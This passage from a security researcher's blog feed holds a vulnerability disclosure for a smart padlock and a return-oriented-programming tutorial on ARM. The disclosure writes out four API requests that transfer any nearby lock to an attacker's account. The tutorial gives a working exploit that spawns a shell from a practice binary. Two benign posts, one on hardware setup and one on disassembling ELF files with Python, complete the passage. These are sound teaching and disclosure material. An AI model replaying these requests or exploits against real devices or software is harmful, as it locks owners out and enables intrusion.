1942<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>
1943
1944<p>This is the value sent in the <code>Write</code> request:</p>
1945
1946<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>
1947
1948<p>We attempted replaying these requests using <code>gattool</code> and <code>gattacker</code>,
1949but that didn’t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
1950
1951<h2 id="via-the-android-app">Via the Android app</h2>
1952
1953<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
1954far since most of it was obfuscated. Why bother when there exists an
1955easier approach—BurpSuite.</p>
1956
1957<p>We captured and played around with a bunch of requests and responses,
1958and finally arrived at a working exploit chain.</p>
1959
1960<h2 id="the-exploit">The exploit</h2>
1961
1962<p>The entire exploit is a 4 step process consisting of authenticated
1963HTTP requests:</p>
1964
1965<ol>
1966<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
1967vicinity), get the barcode and lock ID</li>
1968<li>Using the barcode, fetch the user ID</li>
1969<li>Using the lock ID and user ID, unbind the user from the lock</li>
1970<li>Provide a new name, attacker’s user ID and the MAC to bind the attacker
1971to the lock</li>
1972</ol>
1973
1974<p>This is what it looks like, in essence (personal info redacted).</p>
1975
1976<h3 id="request-1">Request 1</h3>
1977
1978<pre><code>POST /oklock/lock/queryDevice
1979{"mac":"XX:XX:XX:XX:XX:XX"}
1980</code></pre>
1981
1982<p>Response:</p>
1983
1984<pre><code>{
1985 "result":{
1986 "alarm":0,
1987 "barcode":"<BARCODE>",
1988 "chipType":"1",
1989 "createAt":"2019-05-14 09:32:23.0",
1990 "deviceId":"",
1991 "electricity":"95",
1992 "firmwareVersion":"2.3",
1993 "gsmVersion":"",
1994 "id":<LOCK ID>,
1995 "isLock":0,
1996 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
1997 "lockPwd":"000000",
1998 "mac":"XX:XX:XX:XX:XX:XX",
1999 "name":"lock",
2000 "radioName":"BlueFPL",
2001 "type":0
2002 },
2003 "status":"2000"
2004}
2005</code></pre>
2006
2007<h3 id="request-2">Request 2</h3>
2008
2009<pre><code>POST /oklock/lock/getDeviceInfo
2010
2011{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
2012</code></pre>
2013
2014<p>Response:</p>
2015
2016<pre><code> "result":{
2017 "account":"email@some.website",
2018 "alarm":0,
2019 "barcode":"<BARCODE>",
2020 "chipType":"1",
2021 "createAt":"2019-05-14 09:32:23.0",
2022 "deviceId":"",
2023 "electricity":"95",
2024 "firmwareVersion":"2.3",
2025 "gsmVersion":"",
2026 "id":<LOCK ID>,
2027 "isLock":0,
2028 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
2029 "lockPwd":"000000",
2030 "mac":"XX:XX:XX:XX:XX:XX",
2031 "name":"lock",
2032 "radioName":"BlueFPL",
2033 "type":0,
2034 "userId":<USER ID>
2035 }
2036</code></pre>
2037
2038<h3 id="request-3">Request 3</h3>
2039
2040<pre><code>POST /oklock/lock/unbind
2041
2042{"lockId":"<LOCK ID>","userId":<USER ID>}
2043</code></pre>
2044
2045<h3 id="request-4">Request 4</h3>
2046
2047<pre><code>POST /oklock/lock/bind
2048
2049{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
2050</code></pre>
2051
2052<h2 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h2>
2053
2054<p>You should have the lock transferred to your account. The severity of this
2055issue lies in the fact that the original owner completely loses access to
2056their lock. They can’t even “rebind” to get it back, since the current owner
2057(the attacker) needs to authorize that. </p>
2058
2059<p>To add to that, roughly 15,000 user accounts’ info are exposed via IDOR.
2060Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
2061“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
2062
2063<p><em>shudders</em></p>
2064
2065<h2 id="proof-of-concept">Proof of Concept</h2>
2066
2067<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>
2068
2069<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>
2070
2071<h2 id="disclosure-timeline">Disclosure timeline</h2>
2072
2073<ul>
2074<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
2075<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
2076<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
2077<li>No response from vendor</li>
2078<li><strong>2nd August 2019</strong>: Public disclosure</li>
2079</ul>
2080
2081<h2 id="lessons-learnt">Lessons learnt</h2>
2082
2083<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
2084with keys. With the IoT plague spreading, it brings in a large attack surface
2085to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>
2086
2087<p>The IoT security scene is rife with bugs from over 10 years ago, like
2088executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
2089practices in general.</p>
2090
2091<p>Our existing threat models and scenarios have to be updated to factor
2092in these new exploitation possibilities. This also broadens the playing
2093field for cyber warfare and mass surveillance campaigns. </p>
2094
2095<h2 id="researcher-info">Researcher info</h2>
2096
2097<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>
2098
2099<ul>
2100<li>Anirudh Oppiliappan (me)</li>
2101<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
2102<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
2103</ul>
2104
2105<div class="footnotes">
2106<hr />
2107<ol>
2108<li id="fn-1">
2109<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2110</li>
2111
2112<li id="fn-2">
2113<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2114</li>
2115
2116<li id="fn-3">
2117<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
2118</li>
2119</ol>
2120</div>
2121]]></description><link>https://icyphox.sh/blog/fb50</link><pubDate>Mon, 05 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/fb50</guid></item><item><title>Return Oriented Programming on ARM (32-bit)</title><description><![CDATA[<p>Before we start <em>anything</em>, you’re expected to know the basics of ARM
2122assembly to follow along. I highly recommend
2123<a href="https://twitter.com/fox0x01">Azeria’s</a> series on <a href="https://azeria-labs.com/writing-arm-assembly-part-1/">ARM Assembly
2124Basics</a>. Once you’re
2125comfortable with it, proceed with the next bit—environment setup.</p>
2126
2127<h2 id="setup">Setup</h2>
2128
2129<p>Since we’re working with the ARM architecture, there are two options to go
2130forth with: </p>
2131
2132<ol>
2133<li>Emulate—head over to <a href="https://www.qemu.org/download/">qemu.org/download</a> and install QEMU.
2134And then download and extract the ARMv6 Debian Stretch image from one of the links <a href="https://blahcat.github.io/qemu/">here</a>.
2135The scripts found inside should be self-explanatory.</li>
2136<li>Use actual ARM hardware, like an RPi.</li>
2137</ol>
2138
2139<p>For debugging and disassembling, we’ll be using plain old <code>gdb</code>, but you
2140may use <code>radare2</code>, IDA or anything else, really. All of which can be
2141trivially installed.</p>
2142
2143<p>And for the sake of simplicity, disable ASLR:</p>
2144
2145<div class="codehilite"><pre><span></span><code>$ <span class="nb">echo</span> <span class="m">0</span> > /proc/sys/kernel/randomize_va_space
2146</code></pre></div>
2147
2148<p>Finally, the binary we’ll be using in this exercise is <a href="https://twitter.com/bellis1000">Billy Ellis’</a>
2149<a href="/static/files/roplevel2.c">roplevel2</a>. </p>
2150
2151<p>Compile it:</p>
2152
2153<div class="codehilite"><pre><span></span><code>$ gcc roplevel2.c -o rop2
2154</code></pre></div>
2155
2156<p>With that out of the way, here’s a quick run down of what ROP actually is.</p>
2157
2158<h2 id="a-primer-on-rop">A primer on ROP</h2>
2159
2160<p>ROP or Return Oriented Programming is a modern exploitation technique that’s
2161used to bypass protections like the <strong>NX bit</strong> (no-execute bit) and <strong>code sigining</strong>.
2162In essence, no code in the binary is actually modified and the entire exploit
2163is crafted out of pre-existing artifacts within the binary, known as <strong>gadgets</strong>.</p>
2164
2165<p>A gadget is essentially a small sequence of code (instructions), ending with
2166a <code>ret</code>, or a return instruction. In our case, since we’re dealing with ARM
2167code, there is no <code>ret</code> instruction but rather a <code>pop {pc}</code> or a <code>bx lr</code>.
2168These gadgets are <em>chained</em> together by jumping (returning) from one onto the other
2169to form what’s called as a <strong>ropchain</strong>. At the end of a ropchain,
2170there’s generally a call to <code>system()</code>, to acheive code execution.</p>
2171
2172<p>In practice, the process of executing a ropchain is something like this:</p>
2173
2174<ul>
2175<li>confirm the existence of a stack-based buffer overflow</li>
2176<li>identify the offset at which the instruction pointer gets overwritten</li>
2177<li>locate the addresses of the gadgets you wish to use</li>
2178<li>craft your input keeping in mind the stack’s layout, and chain the addresses
2179of your gadgets</li>
2180</ul>
2181
2182<p><a href="https://twitter.com/LiveOverflow">LiveOverflow</a> has a <a href="https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s">beautiful video</a> where he explains ROP using “weird machines”.
2183Check it out, it might be just what you needed for that “aha!” moment :)</p>
2184
2185<p>Still don’t get it? Don’t fret, we’ll look at <em>actual</em> exploit code in a bit and hopefully
2186that should put things into perspective.</p>
2187
2188<h2 id="exploring-our-binary">Exploring our binary</h2>
2189
2190<p>Start by running it, and entering any arbitrary string. On entering a fairly
2191large string, say, “A” × 20, we
2192see a segmentation fault occur.</p>
2193
2194<p><img src="/static/img/string_segfault.png" alt="string and segfault" /></p>
2195
2196<p>Now, open it up in <code>gdb</code> and look at the functions inside it.</p>
2197
2198<p><img src="/static/img/gdb_functions.png" alt="gdb functions" /></p>
2199
2200<p>There are three functions that are of importance here, <code>main</code>, <code>winner</code> and
2201<code>gadget</code>. Disassembling the <code>main</code> function:</p>
2202
2203<p><img src="/static/img/gdb_main_disas.png" alt="gdb main disassembly" /></p>
2204
2205<p>We see a buffer of 16 bytes being created (<code>sub sp, sp, #16</code>), and some calls
2206to <code>puts()</code>/<code>printf()</code> and <code>scanf()</code>. Looks like <code>winner</code> and <code>gadget</code> are
2207never actually called.</p>
2208
2209<p>Disassembling the <code>gadget</code> function:</p>
2210
2211<p><img src="/static/img/gdb_gadget_disas.png" alt="gdb gadget disassembly" /></p>
2212
2213<p>This is fairly simple, the stack is being initialized by <code>push</code>ing <code>{r11}</code>,
2214which is also the frame pointer (<code>fp</code>). What’s interesting is the <code>pop {r0, pc}</code>
2215instruction in the middle. This is a <strong>gadget</strong>.</p>
2216
2217<p>We can use this to control what goes into <code>r0</code> and <code>pc</code>. Unlike in x86 where
2218arguments to functions are passed on the stack, in ARM the registers <code>r0</code> to <code>r3</code>
2219are used for this. So this gadget effectively allows us to pass arguments to
2220functions using <code>r0</code>, and subsequently jumping to them by passing its address
2221in <code>pc</code>. Neat.</p>
2222
2223<p>Moving on to the disassembly of the <code>winner</code> function:</p>
2224
2225<p><img src="/static/img/gdb_disas_winner.png" alt="gdb winner disassembly" /></p>
2226
2227<p>Here, we see a calls to <code>puts()</code>, <code>system()</code> and finally, <code>exit()</code>.
2228So our end goal here is to, quite obviously, execute code via the <code>system()</code>
2229function.</p>
2230
2231<p>Now that we have an overview of what’s in the binary, let’s formulate a method
2232of exploitation by messing around with inputs.</p>
2233
2234<h2 id="messing-around-with-inputs">Messing around with inputs :^)</h2>
2235
2236<p>Back to <code>gdb</code>, hit <code>r</code> to run and pass in a patterned input, like in the
2237screenshot.</p>
2238
2239<p><img src="/static/img/gdb_info_reg_segfault.png" alt="gdb info reg post segfault" /></p>
2240
2241<p>We hit a segfault because of invalid memory at address <code>0x46464646</code>. Notice
2242the <code>pc</code> has been overwritten with our input.
2243So we smashed the stack alright, but more importantly, it’s at the letter ‘F’.</p>
2244
2245<p>Since we know the offset at which the <code>pc</code> gets overwritten, we can now
2246control program execution flow. Let’s try jumping to the <code>winner</code> function.</p>
2247
2248<p>Disassemble <code>winner</code> again using <code>disas winner</code> and note down the offset
2249of the second instruction—<code>add r11, sp, #4</code>.
2250For this, we’ll use Python to print our input string replacing <code>FFFF</code> with
2251the address of <code>winner</code>. Note the endianness.</p>
2252
2253<div class="codehilite"><pre><span></span><code>$ python -c <span class="s1">'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")'</span> <span class="p">|</span> ./rop2
2254</code></pre></div>
2255
2256<p><img src="/static/img/python_winner_jump.png" alt="jump to winner" /></p>
2257
2258<p>The reason we don’t jump to the first instruction is because we want to control the stack
2259ourselves. If we allow <code>push {rll, lr}</code> (first instruction) to occur, the program will <code>pop</code>
2260those out after <code>winner</code> is done executing and we will no longer control
2261where it jumps to.</p>
2262
2263<p>So that didn’t do much, just prints out a string “Nothing much here…”.
2264But it <em>does</em> however, contain <code>system()</code>. Which somehow needs to be populated with an argument
2265to do what we want (run a command, execute a shell, etc.).</p>
2266
2267<p>To do that, we’ll follow a multi-step process: </p>
2268
2269<ol>
2270<li>Jump to the address of <code>gadget</code>, again the 2nd instruction. This will <code>pop</code> <code>r0</code> and <code>pc</code>.</li>
2271<li>Push our command to be executed, say “<code>/bin/sh</code>” onto the stack. This will go into
2272<code>r0</code>.</li>
2273<li>Then, push the address of <code>system()</code>. And this will go into <code>pc</code>.</li>
2274</ol>
2275
2276<p>The pseudo-code is something like this:</p>
2277
2278<pre><code>string = AAAABBBBCCCCDDDDEEEE
2279gadget = # addr of gadget
2280binsh = # addr of /bin/sh
2281system = # addr of system()
2282
2283print(string + gadget + binsh + system)
2284</code></pre>
2285
2286<p>Clean and mean.</p>
2287
2288<h2 id="the-exploit">The exploit</h2>
2289
2290<p>To write the exploit, we’ll use Python and the absolute godsend of a library—<code>struct</code>.
2291It allows us to pack the bytes of addresses to the endianness of our choice.
2292It probably does a lot more, but who cares.</p>
2293
2294<p>Let’s start by fetching the address of <code>/bin/sh</code>. In <code>gdb</code>, set a breakpoint
2295at <code>main</code>, hit <code>r</code> to run, and search the entire address space for the string “<code>/bin/sh</code>”:</p>
2296
2297<pre><code>(gdb) find &system, +9999999, "/bin/sh"
2298</code></pre>
2299
2300<p><img src="/static/img/gdb_find_binsh.png" alt="gdb finding /bin/sh" /></p>
2301
2302<p>One hit at <code>0xb6f85588</code>. The addresses of <code>gadget</code> and <code>system()</code> can be
2303found from the disassmblies from earlier. Here’s the final exploit code:</p>
2304
2305<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">struct</span>
2306
2307<span class="n">binsh</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0xb6f85588</span><span class="p">)</span>
2308<span class="n">string</span> <span class="o">=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEE"</span>
2309<span class="n">gadget</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010550</span><span class="p">)</span>
2310<span class="n">system</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">"I"</span><span class="p">,</span> <span class="mh">0x00010538</span><span class="p">)</span>
2311
2312<span class="nb">print</span><span class="p">(</span><span class="n">string</span> <span class="o">+</span> <span class="n">gadget</span> <span class="o">+</span> <span class="n">binsh</span> <span class="o">+</span> <span class="n">system</span><span class="p">)</span>
2313</code></pre></div>
2314
2315<p>Honestly, not too far off from our pseudo-code :)</p>
2316
2317<p>Let’s see it in action:</p>
2318
2319<p><img src="/static/img/the_shell.png" alt="the shell!" /></p>
2320
2321<p>Notice that it doesn’t work the first time, and this is because <code>/bin/sh</code> terminates
2322when the pipe closes, since there’s no input coming in from STDIN.
2323To get around this, we use <code>cat(1)</code> which allows us to relay input through it
2324to the shell. Nifty trick.</p>
2325
2326<h2 id="conclusion">Conclusion</h2>
2327
2328<p>This was a fairly basic challenge, with everything laid out conveniently.
2329Actual ropchaining is a little more involved, with a lot more gadgets to be chained
2330to acheive code execution.</p>
2331
2332<p>Hopefully, I’ll get around to writing about heap exploitation on ARM too. That’s all for now.</p>
2333]]></description><link>https://icyphox.sh/blog/rop-on-arm</link><pubDate>Thu, 06 Jun 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/rop-on-arm</guid></item><item><title>My setup</title><description><![CDATA[<h2 id="hardware">Hardware</h2>
2334
2335<p>The only computer I have with me is my <a href="https://store.hp.com/us/en/mdp/laptops/envy-13">HP Envy 13 (2018)</a> (my model looks a little different). It’s a 13” ultrabook, with an i5 8250u,
23368 gigs of RAM and a 256 GB NVMe SSD. It’s a very comfy machine that does everything I need it to.</p>
2337
2338<p>For my phone, I use a <a href="https://www.oneplus.in/6t">OnePlus 6T</a>, running stock <a href="https://www.oneplus.in/oxygenos">OxygenOS</a>. As of this writing, its bootloader hasn’t been unlocked and nor has the device been rooted.
2339I’m also a proud owner of a <a href="https://en.wikipedia.org/wiki/Nexus_5">Nexus 5</a>, which I really wish Google rebooted. It’s surprisingly still usable and runs Android Pie, although the SIM slot is ruined and the battery backup is abysmal.</p>
2340
2341<p>My watch is a <a href="https://www.samsung.com/in/wearables/gear-s3-frontier-r760/">Samsung Gear S3 Frontier</a>. Tizen is definitely better than Android Wear.</p>
2342
2343<p>My keyboard, although not with me in college, is a very old <a href="https://www.amazon.com/Dell-Keyboard-Model-SK-8110-Interface/dp/B00366HMMO">Dell SK-8110</a>.
2344For the little bit of gaming that I do, I use a <a href="https://www.hpshopping.in/hp-m150-gaming-mouse-3dr63pa.html">HP m150</a> gaming mouse. It’s the perfect size (and color).</p>
2345
2346<p>For my music, I use the <a href="https://www.boseindia.com/en_in/products/headphones/over_ear_headphones/soundlink-around-ear-wireless-headphones-ii.html">Bose SoundLink II</a>.
2347Great pair of headphones, although the ear cups need replacing.</p>
2348
2349<h2 id="and-the-software">And the software</h2>
2350
2351<p><del>My distro of choice for the past ~1 year has been <a href="https://elementary.io">elementary OS</a>. I used to be an Arch Linux elitist, complete with an esoteric
2352window manager, all riced. I now use whatever JustWorks™.</del></p>
2353
2354<p><strong>Update</strong>: As of June 2019, I’ve switched over to a vanilla Debian 9 Stretch install,
2355running <a href="https://i3wm.org">i3</a> as my window manager. If you want, you can dig through my configs at my <a href="https://github.com/icyphox/dotfiles">dotfiles</a> repo. </p>
2356
2357<p>Here’s a (riced) screenshot of my desktop. </p>
2358
2359<p><img src="https://i.redd.it/jk574gworp331.png" alt="scrot" /></p>
2360
2361<p>Most of my work is done in either the browser, or the terminal.
2362My shell is pure <a href="http://www.zsh.org">zsh</a>, as in no plugin frameworks. It’s customized using built-in zsh functions. Yes, you don’t actually need
2363a framework. It’s useless bloat. The prompt itself is generated using a framework I built in <a href="https://nim-lang.org">Nim</a>—<a href="https://github.com/icyphox/nicy">nicy</a>.
2364My primary text editor is <a href="https://neovim.org">nvim</a>. Again, all configs in my dotfiles repo linked above.
2365I manage all my passwords using <a href="https://passwordstore.org">pass(1)</a>, and I use <a href="https://github.com/carnager/rofi-pass">rofi-pass</a> to access them via <code>rofi</code>.</p>
2366
2367<p>Most of my security tooling is typically run via a Kali Linux docker container. This is convenient for many reasons, keeps your global namespace
2368clean and a single command to drop into a Kali shell.</p>
2369
2370<p>I use a DigitalOcean droplet (BLR1) as a public filehost, found at <a href="https://x.icyphox.sh">x.icyphox.sh</a>. The UI is the wonderful <a href="https://github.com/zeit/serve">serve</a>, by <a href="https://zeit.co">ZEIT</a>.
2371The same box also serves as my IRC bouncer and OpenVPN (TCP), which I tunnel via SSH running on 443. Campus firewall woes. </p>
2372
2373<p>I plan on converting my desktop back at home into a homeserver setup. Soon™.</p>
2374]]></description><link>https://icyphox.sh/blog/my-setup</link><pubDate>Mon, 13 May 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/my-setup</guid></item><item><title>Python for Reverse Engineering #1: ELF Binaries</title><description><![CDATA[<p>While solving complex reversing challenges, we often use established tools like radare2 or IDA for disassembling and debugging. But there are times when you need to dig in a little deeper and understand how things work under the hood.</p>
2375
2376<p>Rolling your own disassembly scripts can be immensely helpful when it comes to automating certain processes, and eventually build your own homebrew reversing toolchain of sorts. At least, that’s what I’m attempting anyway.</p>
2377
2378<h2 id="setup">Setup</h2>
2379
2380<p>As the title suggests, you’re going to need a Python 3 interpreter before
2381anything else. Once you’ve confirmed beyond reasonable doubt that you do,
2382in fact, have a Python 3 interpreter installed on your system, run</p>
2383
2384<div class="codehilite"><pre><span></span><code><span class="gp">$</span> pip install capstone pyelftools
2385</code></pre></div>
2386
2387<p>where <code>capstone</code> is the disassembly engine we’ll be scripting with and <code>pyelftools</code> to help parse ELF files.</p>
2388
2389<p>With that out of the way, let’s start with an example of a basic reversing
2390challenge.</p>
2391
2392<div class="codehilite"><pre><span></span><code><span class="cm">/* chall.c */</span>
2393
2394<span class="cp">#include</span> <span class="cpf"><stdio.h></span><span class="cp"></span>
2395<span class="cp">#include</span> <span class="cpf"><stdlib.h></span><span class="cp"></span>
2396<span class="cp">#include</span> <span class="cpf"><string.h></span><span class="cp"></span>
2397
2398<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
2399 <span class="kt">char</span> <span class="o">*</span><span class="n">pw</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">9</span><span class="p">);</span>
2400 <span class="n">pw</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'a'</span><span class="p">;</span>
2401 <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span> <span class="n">i</span> <span class="o"><=</span> <span class="mi">8</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">){</span>
2402 <span class="n">pw</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">pw</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>
2403 <span class="p">}</span>
2404 <span class="n">pw</span><span class="p">[</span><span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span>
2405 <span class="kt">char</span> <span class="o">*</span><span class="n">in</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span>
2406 <span class="n">printf</span><span class="p">(</span><span class="s">"password: "</span><span class="p">);</span>
2407 <span class="n">fgets</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="mi">10</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// 'abcdefghi'</span>
2408 <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">in</span><span class="p">,</span> <span class="n">pw</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
2409 <span class="n">printf</span><span class="p">(</span><span class="s">"haha yes!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
2410 <span class="p">}</span>
2411 <span class="k">else</span> <span class="p">{</span>
2412 <span class="n">printf</span><span class="p">(</span><span class="s">"nah dude</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
2413 <span class="p">}</span>
2414<span class="p">}</span>
2415</code></pre></div>
2416
2417<p>Compile it with GCC/Clang:</p>
2418
2419<div class="codehilite"><pre><span></span><code><span class="gp">$</span> gcc chall.c -o chall.elf
2420</code></pre></div>
2421
2422<h2 id="scripting">Scripting</h2>
2423
2424<p>For starters, let’s look at the different sections present in the binary.</p>
2425
2426<div class="codehilite"><pre><span></span><code><span class="c1"># sections.py</span>
2427
2428<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
2429
2430<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./chall.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2431 <span class="n">e</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
2432 <span class="k">for</span> <span class="n">section</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">iter_sections</span><span class="p">():</span>
2433 <span class="nb">print</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">section</span><span class="p">[</span><span class="s1">'sh_addr'</span><span class="p">]),</span> <span class="n">section</span><span class="o">.</span><span class="n">name</span><span class="p">)</span>
2434</code></pre></div>
2435
2436<p>This script iterates through all the sections and also shows us where it’s loaded. This will be pretty useful later. Running it gives us</p>
2437
2438<div class="codehilite"><pre><span></span><code><span class="go">› python sections.py</span>
2439<span class="go">0x238 .interp</span>
2440<span class="go">0x254 .note.ABI-tag</span>
2441<span class="go">0x274 .note.gnu.build-id</span>
2442<span class="go">0x298 .gnu.hash</span>
2443<span class="go">0x2c0 .dynsym</span>
2444<span class="go">0x3e0 .dynstr</span>
2445<span class="go">0x484 .gnu.version</span>
2446<span class="go">0x4a0 .gnu.version_r</span>
2447<span class="go">0x4c0 .rela.dyn</span>
2448<span class="go">0x598 .rela.plt</span>
2449<span class="go">0x610 .init</span>
2450<span class="go">0x630 .plt</span>
2451<span class="go">0x690 .plt.got</span>
2452<span class="go">0x6a0 .text</span>
2453<span class="go">0x8f4 .fini</span>
2454<span class="go">0x900 .rodata</span>
2455<span class="go">0x924 .eh_frame_hdr</span>
2456<span class="go">0x960 .eh_frame</span>
2457<span class="go">0x200d98 .init_array</span>
2458<span class="go">0x200da0 .fini_array</span>
2459<span class="go">0x200da8 .dynamic</span>
2460<span class="go">0x200f98 .got</span>
2461<span class="go">0x201000 .data</span>
2462<span class="go">0x201010 .bss</span>
2463<span class="go">0x0 .comment</span>
2464<span class="go">0x0 .symtab</span>
2465<span class="go">0x0 .strtab</span>
2466<span class="go">0x0 .shstrtab</span>
2467</code></pre></div>
2468
2469<p>Most of these aren’t relevant to us, but a few sections here are to be noted. The <code>.text</code> section contains the instructions (opcodes) that we’re after. The <code>.data</code> section should have strings and constants initialized at compile time. Finally, the <code>.plt</code> which is the Procedure Linkage Table and the <code>.got</code>, the Global Offset Table. If you’re unsure about what these mean, read up on the ELF format and its internals.</p>
2470
2471<p>Since we know that the <code>.text</code> section has the opcodes, let’s disassemble the binary starting at that address.</p>
2472
2473<div class="codehilite"><pre><span></span><code><span class="c1"># disas1.py</span>
2474
2475<span class="kn">from</span> <span class="nn">elftools.elf.elffile</span> <span class="kn">import</span> <span class="n">ELFFile</span>
2476<span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>
2477
2478<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'./bin.elf'</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
2479 <span class="n">elf</span> <span class="o">=</span> <span class="n">ELFFile</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
2480 <span class="n">code</span> <span class="o">=</span> <span class="n">elf</span><span class="o">.</span><span class="n">get_section_by_name</span><span class="p">(</span><span class="s1">'.text'</span><span class="p">)</span>
2481 <span class="n">ops</span> <span class="o">=</span> <span class="n">code</span><span class="o">.</span><span class="n">data</span><span class="p">()</span>
2482 <span class="n">addr</span> <span class="o">=</span> <span class="n">code</span><span class="p">[</span><span class="s1">'sh_addr'</span><span class="p">]</span>
2483 <span class="n">md</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
2484 <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">md</span><span class="o">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">ops</span><span class="p">,</span> <span class="n">addr</span><span class="p">):</span>
2485 <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s1">'0x</span><span class="si">{i.address:x}</span><span class="s1">:</span><span class="se">\t</span><span class="si">{i.mnemonic}</span><span class="se">\t</span><span class="si">{i.op_str}</span><span class="s1">'</span><span class="p">)</span>
2486</code></pre></div>
2487
2488<p>The code is fairly straightforward (I think). We should be seeing this, on running</p>
2489
2490<div class="codehilite"><pre><span></span><code><span class="go">› python disas1.py | less </span>
2491<span class="go">0x6a0: xor ebp, ebp</span>
2492<span class="go">0x6a2: mov r9, rdx</span>
2493<span class="go">0x6a5: pop rsi</span>
2494<span class="go">0x6a6: mov rdx, rsp</span>
2495<span class="go">0x6a9: and rsp, 0xfffffffffffffff0</span>
2496<span class="go">0x6ad: push rax</span>
2497<span class="go">0x6ae: push rsp</span>
2498<span class="go">0x6af: lea r8, [rip + 0x23a]</span>
2499<span class="go">0x6b6: lea rcx, [rip + 0x1c3]</span>
2500<span class="go">0x6bd: lea rdi, [rip + 0xe6]</span>
2501<span class="go">**0x6c4: call qword ptr [rip + 0x200916]**</span>
